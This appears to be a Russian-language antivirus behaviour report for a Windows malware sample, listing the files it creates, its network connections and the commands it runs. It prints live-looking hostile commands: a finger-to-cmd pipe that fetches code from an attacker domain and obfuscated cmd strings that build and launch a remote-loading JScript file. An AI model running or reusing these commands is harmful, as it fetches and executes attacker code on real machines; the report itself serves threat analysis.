Техническая информация
Вредоносные функции
Создает и запускает на исполнение
- '<SYSTEM32>\finger.exe' ok@tcaaw2.ussuendir.xyz
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "%LOCALAPPDATA%\2B2.js"
Изменения в файловой системе
Создает следующие файлы
- %LOCALAPPDATA%\2b2.js
Сетевая активность
Подключается к
- 'tc####.ussuendir.xyz':79
- '77####.seordor.xyz':80
TCP
- 'tc####.ussuendir.xyz':79
UDP
- DNS ASK tc####.ussuendir.xyz
- DNS ASK 77####.seordor.xyz
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c finger ok@tcaaw2.ussuendir.xyz |more +2 |cmd
- '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\cmd.exe' /V/D/c "SEt WAIA=.j&&SEt PWSNQ=v1bZ4ar1bZ4 a =1bZ4 'sc1bZ4ri1bZ4pt1bZ4:'; b =1bZ4 'h1bZ4TtP1bZ4:'; G1bZ4et1bZ4Obj1bZ4ec1bZ4t(1bZ4a+b+'&&sET BFTR=UNNVPUNNVP77ia1r.seordor.xyzUNNVP?1UNNVP')&&sEt/...
- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p 0HRSX="%PWSNQ:1bZ4=%%BFTR:UNNVP=/%" 0<nul 1>%LOCALAPPDATA%\2B2%WAIA%s"
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start %LOCALAPPDATA%\2B2%WAIA%s "
- '<SYSTEM32>\cmd.exe' /c start %LOCALAPPDATA%\2B2.js
